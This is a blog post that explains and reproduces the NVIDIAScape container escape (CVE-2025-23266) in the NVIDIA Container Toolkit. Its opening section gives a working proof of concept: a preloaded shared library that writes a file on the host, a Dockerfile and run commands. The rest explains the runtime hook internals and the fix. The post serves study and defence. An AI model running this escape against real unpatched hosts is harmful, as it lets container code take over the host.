NVIDIA Container Escape CVE-2025-23266 (aka NVIDIAScape)
First part of the series. How does the NVIDIA Container Toolkit work, and which mechanisms enable NVIDIAScape?
Introduction
On July 17, 2025, Wiz published details of a container escape in NVIDIA's Container Runtime. Their blog post explains in detail how an exploit works, but it does not address a few runtime internals, specifically how container hooks work under the hood.
This blog post explains:
- How to reproduce the issue by yourself
- Why this is an issue in the first place
- How the fix is implemented
Reproducing the issue
You can reproduce the issue yourself with the following steps (they are meant for Ubuntu, but are easily adaptable for other distributions):
Run this only in an isolated lab environment, never on production hosts.
Install and Configure NVIDIA Container Toolkit
- Download NVIDIA Container Toolkit version 1.17.7 or earlier. The one I used was https://github.com/NVIDIA/nvidia-container-toolkit/releases/download/v1.17.7/nvidia-container-toolkit_1.17.7_deb_amd64.tar.gz
- Unpack the .deb files to ~/release-v1.17.7-stable/packages/ubuntu18.04/amd64/
- Then, run the following commands in order (as sudo):
```bash
dpkg -i libnvidia-container1_1.17.7-1_amd64.deb
dpkg -i libnvidia-container-tools_1.17.7-1_amd64.deb
dpkg -i nvidia-container-toolkit-base_1.17.7-1_amd64.deb
dpkg -i nvidia-container-toolkit_1.17.7-1_amd64.deb
```
- Configure the NVIDIA runtime by running:
```bash
sudo nvidia-ctk runtime configure --runtime=docker
```
- Then, restart Docker with:
```bash
sudo systemctl restart docker
```
Some of these steps are taken from here.
Create a shared library
The exploit requires a shared library to be loaded by the NVIDIA Container Runtime. The following code creates one that creates a /owned file on the host:
poc.c
```c
// poc.c - minimal malicious LD_PRELOAD library (creates /owned)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

// This function is called when the shared library is loaded
__attribute__((constructor))
void init(void) {
    int fd = open("/owned", O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd != -1) {
        write(fd, "You have been owned!\n", 21);
        close(fd);
    }
}
```
Build it with:
```bash
gcc -fPIC -shared -o poc.so poc.c
```
We will explain later in detail how this code works.
Configure OCI hook for NVIDIA Container Runtime
The createContainer OCI hook only executes when the CUDA Forward Compatibility mode is set to “hook.”
Add or edit the /etc/nvidia-container-runtime/config.toml file so it contains the following:
```toml
[nvidia-container-runtime.modes.legacy]
cuda-compat-mode = "hook"
```
A detailed explanation about CUDA Forward Compatibility mode will follow later in this post.
Create a Docker image
This Docker image will contain the poc.so library that we created in the previous step. A vulnerable runtime will load this library and execute it at host level.
Dockerfile
```dockerfile
FROM busybox
ENV LD_PRELOAD=./poc.so
ADD poc.so /
```
The Dockerfile and poc.so must be in the same folder.
Then build the image with:
```bash
docker build . -t nvidiascape-exploit
```
The command should create a new Docker image with a tag (-t) nvidiascape-exploit.
Then, run it with the following command:
```bash
docker run --rm --runtime=nvidia --gpus=all nvidiascape-exploit
```
If everything works correctly, you should see an /owned file in the host's root directory.
Understanding the issue
To properly understand how this exploit was crafted, we need to cover a few subjects first:
- Dynamic linker behavior
- Docker alternate runtimes
- CUDA Forward Compatibility
- OCI Runtime Specs and Hooks
Dynamic linker behavior
Whenever an application runs, it might require shared libraries: binaries that are not part of the application itself, but are distributed as part of other packages. The dynamic linker's job is to resolve these libraries at runtime.
The dynamic linker provides a feature where shared libraries set by the LD_PRELOAD environment variable take precedence over all others. As a debugging feature, this might sound useful, but it is risky for sensitive applications. The ld.so man page states:
```
Secure-execution mode
   For security reasons, if the dynamic linker determines that a
   binary should be run in secure-execution mode, the effects of some
   environment variables are voided or modified, and furthermore
   those environment variables are stripped from the environment, so
   that the program does not even see the definitions.
```
As an experiment, try to run this on your terminal:
```bash
sudo LD_PRELOAD=/home/filiperodrigues/nvidiascape-exploit/poc.so find
```
You will end up with the same /owned file as in the original exploit.
The poc.so itself is rather simple: upon init, it creates a /owned file, then writes some content to it.
```c
void init(void) {
    int fd = open("/owned", O_WRONLY | O_CREAT | O_TRUNC, 0644);
```
The initializer is provided by the __attribute__((constructor)) function attribute.
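For comparison, Go (the language the NVIDIA Container Toolkit itself is written in) has a loose analogue of this mechanism: a package-level init() function runs before main() without ever being called explicitly. A minimal sketch:

```go
package main

import "fmt"

// order records which functions ran, and in what sequence.
var order []string

// init runs automatically before main, much like a constructor
// function in a shared library runs as soon as the library is loaded.
func init() {
	order = append(order, "init")
}

func main() {
	order = append(order, "main")
	fmt.Println(order)
}
```

The difference, of course, is that LD_PRELOAD lets an attacker inject such an initializer into someone else's process, whereas Go's init() only runs code already compiled into the binary.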
Alternate runtimes
The default Docker runtime is runc. However, you can opt to use other runtimes that expose the same command-line interface as runc. When you ran sudo nvidia-ctk runtime configure --runtime=docker earlier, it added an entry to /etc/docker/daemon.json, which should look like the following:
```json
{
  "runtimes": {
    "nvidia": {
      "args": [],
      "path": "nvidia-container-runtime"
    }
  }
}
```
That tells Docker to use the nvidia-container-runtime application whenever you run a container with --runtime=nvidia.
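To make the mapping concrete, here is a short sketch (using hand-rolled structs, not Docker's actual types) that parses a daemon.json fragment like the one above and resolves the runtime name to its binary path:

```go
package main

import (
	"encoding/json"
	"fmt"
)

// runtimeEntry mirrors one entry under "runtimes" in /etc/docker/daemon.json.
type runtimeEntry struct {
	Path string   `json:"path"`
	Args []string `json:"args"`
}

// daemonConfig mirrors the fragment of daemon.json we care about.
type daemonConfig struct {
	Runtimes map[string]runtimeEntry `json:"runtimes"`
}

// parseDaemonConfig decodes a daemon.json fragment.
func parseDaemonConfig(raw []byte) (daemonConfig, error) {
	var cfg daemonConfig
	err := json.Unmarshal(raw, &cfg)
	return cfg, err
}

func main() {
	raw := []byte(`{"runtimes": {"nvidia": {"args": [], "path": "nvidia-container-runtime"}}}`)
	cfg, err := parseDaemonConfig(raw)
	if err != nil {
		panic(err)
	}
	// Docker resolves --runtime=nvidia through this map to a binary path.
	fmt.Println(cfg.Runtimes["nvidia"].Path)
}
```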
CUDA Forward Compatibility
CUDA forward compatibility allows containers or applications built with a newer version of the CUDA toolkit (user-mode libraries) to run on systems where the host driver is slightly older, as long as certain compatibility libraries are present. This is particularly useful for containerized workloads where:
- You might build and ship containers with newer CUDA versions than what the host has installed.
- Upgrading drivers on production systems isn’t always immediate or practical.
According to the documentation:
```
The CUDA forward compatibility package will then be installed to the versioned toolkit directory. For example,
for the CUDA forward compatibility package of 12.8, the GPU driver libraries of 570 will be installed in /usr/local/cuda-12.8/compat/.
```
It is important to note that these libraries are installed on the host.
The NVIDIA Container Runtime implements forward compatibility as an OCI hook. If the nvidia-container-runtime.modes.legacy.cuda-compat-mode config option is set to "hook", the enable-cuda-compat hook is used.
The hook then executes and mounts the compat libraries under /usr/local/cuda/compat. The mechanism used is called the Container Device Interface (CDI).
OCI Runtime Specs and Hooks
We have mentioned OCI hooks a couple of times.
Whenever a container is created by Docker, it creates a JSON structure called an OCI runtime spec configuration. OCI stands for Open Container Initiative, the governing body responsible for container standards.
According to their page:
```
This configuration file contains metadata necessary to implement standard operations against the container. This includes the process to run, environment variables to inject, sandboxing features to use, etc.
```
For example, you can define an OCI runtime spec configuration like this:
```json
{
  "ociVersion": "1.2.1",
  "process": {
    "user": {
      "uid": 0,
      "gid": 0,
      "additionalGids": [0, 10]
    },
    "args": [
      "sh"
    ],
    "env": [
      "FOO=bar"
    ]
  }
}
```
That tells the container runtime (runc) to run sh as the container's process, with the environment variable FOO set to bar.
The values in this spec can come from different places. For the sake of this blog post, two are important:
- The Dockerfile
- The NVIDIA Container Runtime
When Docker processes an ENV instruction in a Dockerfile, it adds those values to the process.env attribute in the spec.
If you have a Dockerfile like the one below:
```dockerfile
FROM busybox
ENV FOO=bar
CMD ["sh"]
```
You will end up with a spec like the one above.
The NVIDIA Container Runtime is a shim for runc. According to its README on GitHub:
When a create command is detected, the incoming OCI runtime specification is modified in place and the command is forwarded to the low-level runtime.
The runc create command is executed whenever a new container is created. When that happens, the NVIDIA Container Runtime updates the spec to add a new hook.
Hooks are applications that can run at different stages of the container lifecycle (see the POSIX-platform hooks section of the OCI runtime spec, https://specs.opencontainers.org/runtime-spec/config/#posix-platform-hooks):
- createRuntime
- createContainer
- startContainer
- postStart
- postStop
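To make the mechanics concrete, here is a hedged sketch, using hand-rolled stand-ins for the official specs-go types, of how a shim-style runtime can append a createContainer hook to a spec before forwarding it to the low-level runtime:

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Minimal stand-ins for the OCI runtime-spec types; the real
// definitions live in github.com/opencontainers/runtime-spec/specs-go.
type Hook struct {
	Path string   `json:"path"`
	Args []string `json:"args,omitempty"`
	Env  []string `json:"env,omitempty"`
}

type Hooks struct {
	CreateContainer []Hook `json:"createContainer,omitempty"`
}

type Spec struct {
	OCIVersion string `json:"ociVersion"`
	Hooks      *Hooks `json:"hooks,omitempty"`
}

// addCreateContainerHook mimics what a shim runtime does: modify the
// incoming spec in place before handing it to the low-level runtime.
func addCreateContainerHook(spec *Spec, h Hook) {
	if spec.Hooks == nil {
		spec.Hooks = &Hooks{}
	}
	spec.Hooks.CreateContainer = append(spec.Hooks.CreateContainer, h)
}

func main() {
	spec := Spec{OCIVersion: "1.2.1"}
	addCreateContainerHook(&spec, Hook{
		Path: "/usr/bin/nvidia-ctk",
		Args: []string{"nvidia-ctk", "hook", "enable-cuda-compat"},
	})
	out, _ := json.MarshalIndent(spec, "", "  ")
	fmt.Println(string(out))
}
```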
A container hook created by the NVIDIA Container Runtime looks like this:
```json
"createContainer": [
  {
    "path": "/usr/bin/nvidia-ctk",
    "args": [
      "nvidia-ctk",
      "hook",
      "enable-cuda-compat",
      "--host-driver-version=575.64.03"
    ],
    "env": []
  },
  {
    "path": "/usr/bin/nvidia-ctk",
    "args": [
      "nvidia-ctk",
      "hook",
      "update-ldcache"
    ],
    "env": []
  }
]
```
Notice that you can specify environment variables for the hook itself.
The createContainer hook is special because although its path resolves on the host (or the “runtime namespace”, as the spec says), the hook itself executes within the “container namespace”.
The combination of all of these is what creates this issue:
- Docker adds the environment variable to the container spec
- NVIDIA Container Runtime adds the createContainer hook with no environment variables
- The /usr/bin/nvidia-ctk hook runs with its environment unspecified, which results in it inheriting environment variables from its parent process
The explanation for why /usr/bin/nvidia-ctk inherits parent process environment variables is in part 2 of this post.
Experimenting with nvidia-container-toolkit
If you want to understand how the NVIDIA Container Runtime is implemented, you can clone the following repository:
```
https://github.com/NVIDIA/nvidia-container-toolkit
```
This repository creates the nvidia-ctk and nvidia-container-runtime binaries, among others.
The function that creates a new runtime spec is newNVIDIAContainerRuntime, located in internal/runtime/runtime_factory.go.
The relevant parts are oci.NewSpec and newSpecModifier. These two functions:
- Create an OCI specification object (ociSpec) from command-line args. The OCI spec describes how the container should be set up (namespaces, mounts, env vars, etc.).
- Create a spec modifier: a helper object that knows how to change the original OCI spec to inject NVIDIA-specific libraries, mounts, hooks, etc., needed for GPU containers.
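The modifier pattern itself can be sketched in a few lines. The interface and type names below are illustrative, not the toolkit's actual code; note the explicit Env slice on the injected hook, which mirrors the patched behavior:

```go
package main

import "fmt"

// Illustrative stand-ins for the toolkit's internal types.
type Hook struct {
	Path string
	Args []string
	Env  []string
}

type Spec struct {
	CreateContainerHooks []Hook
}

// SpecModifier sketches the modifier abstraction: something that
// knows how to rewrite an OCI spec in place.
type SpecModifier interface {
	Modify(*Spec) error
}

// cudaCompatModifier injects the enable-cuda-compat hook. The
// explicit Env slice means the hook no longer runs with an
// unspecified (and therefore inherited) environment.
type cudaCompatModifier struct{}

func (cudaCompatModifier) Modify(s *Spec) error {
	s.CreateContainerHooks = append(s.CreateContainerHooks, Hook{
		Path: "/usr/bin/nvidia-ctk",
		Args: []string{"nvidia-ctk", "hook", "enable-cuda-compat"},
		Env:  []string{"NVIDIA_CTK_DEBUG=false"},
	})
	return nil
}

func main() {
	var spec Spec
	var m SpecModifier = cudaCompatModifier{}
	if err := m.Modify(&spec); err != nil {
		panic(err)
	}
	fmt.Printf("%+v\n", spec.CreateContainerHooks[0])
}
```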
You can see the actual spec by doing this:
- Add the following to the newNVIDIAContainerRuntime function
```go
// Requires "encoding/json" in the file's imports.
if logger != nil {
	if specJSON, err := json.MarshalIndent(ociSpec, "", "  "); err == nil {
		logger.Infof("OCI Spec: %s", string(specJSON))
	} else {
		logger.Warningf("Failed to marshal OCI spec for logging: %v", err)
	}
}
```
- Edit the runtime config (/etc/nvidia-container-runtime/config.toml) to enable logs:
```toml
[nvidia-container-runtime]
debug = "/var/log/nvidia-container-runtime.log"
```
Then build it with:
```bash
make binaries
```
And copy the resulting file to /usr/bin/nvidia-container-runtime.
After that, you should see the following output on the /var/log/nvidia-container-runtime.log file:
```json
{
  "ociVersion": "1.2.1",
  "process": {
    "user": {
      "uid": 0,
      "gid": 0,
      "additionalGids": [0, 10]
    },
    "args": [
      "sh"
    ],
    "env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "HOSTNAME=e078abd14abe",
      "LD_PRELOAD=./poc.so",
      "NVIDIA_VISIBLE_DEVICES=all"
    ],
    "cwd": "/",
    "capabilities": {
      "bounding": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ],
      "effective": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ],
      "permitted": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ]
    },
    "apparmorProfile": "docker-default",
    "oomScoreAdj": 0
  },
  "root": {
    "path": "/var/lib/docker/overlay2/b29b8b924bfcb60a5b2adadd98c935fe659480f24be017259f56cf49ead0d3ed/merged"
  },
  "hostname": "e078abd14abe",
  "mounts": [
    {
      "destination": "/proc",
      "type": "proc",
      "source": "proc",
      "options": ["nosuid", "noexec", "nodev"]
    }
  ],
  "hooks": {
    "prestart": [
      {
        "path": "/usr/bin/nvidia-container-runtime-hook",
        "args": [
          "nvidia-container-runtime-hook",
          "prestart"
        ],
        "env": [
          "LANG=en_US.UTF-8",
          "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin",
          "NOTIFY_SOCKET=/run/systemd/notify",
          "INVOCATION_ID=6a71d6bbe6634f0baebf6075a9ece8b2",
          "JOURNAL_STREAM=8:22608",
          "SYSTEMD_EXEC_PID=2089",
          "OTEL_SERVICE_NAME=dockerd",
          "OTEL_EXPORTER_OTLP_TRACES_PROTOCOL=http/protobuf",
          "OTEL_EXPORTER_OTLP_METRICS_PROTOCOL=http/protobuf",
          "TMPDIR=/var/lib/docker/tmp"
        ]
      }
    ]
  },
  // etc.
```
You will notice that LD_PRELOAD is part of the container spec.
The fix
Before the fix, this is how createContainer would look:
```json
"createContainer": [
  {
    "path": "/usr/bin/nvidia-ctk",
    "args": [
      "nvidia-ctk",
      "hook",
      "enable-cuda-compat",
      "--host-driver-version=575.64.03"
    ]
  },
  {
    "path": "/usr/bin/nvidia-ctk",
    "args": [
      "nvidia-ctk",
      "hook",
      "update-ldcache"
    ]
  }
]
```
And this is how it looks after:
```json
"createContainer": [
  {
    "path": "/usr/bin/nvidia-ctk",
    "args": [
      "nvidia-ctk",
      "hook",
      "enable-cuda-compat",
      "--host-driver-version=575.64.03"
    ],
    "env": [
      "NVIDIA_CTK_DEBUG=false"
    ]
  },
  {
    "path": "/usr/bin/nvidia-ctk",
    "args": [
      "nvidia-ctk",
      "hook",
      "update-ldcache"
    ],
    "env": [
      "NVIDIA_CTK_DEBUG=false"
    ]
  }
]
```
With the fix, createContainer has an explicit env section, which was not present before. Since the issue was caused by inherited environment variables, this prevents attacker-controlled values like LD_PRELOAD from leaking into the hook process.
Final thoughts
This post covered, in depth, what comes into play for this vulnerability to exist. The only part left out was this:
While prestart hooks run in a clean, isolated context, createContainer hooks have a critical property: they inherit environment variables from the container image unless explicitly configured not to.
I have dedicated a second post to this topic here.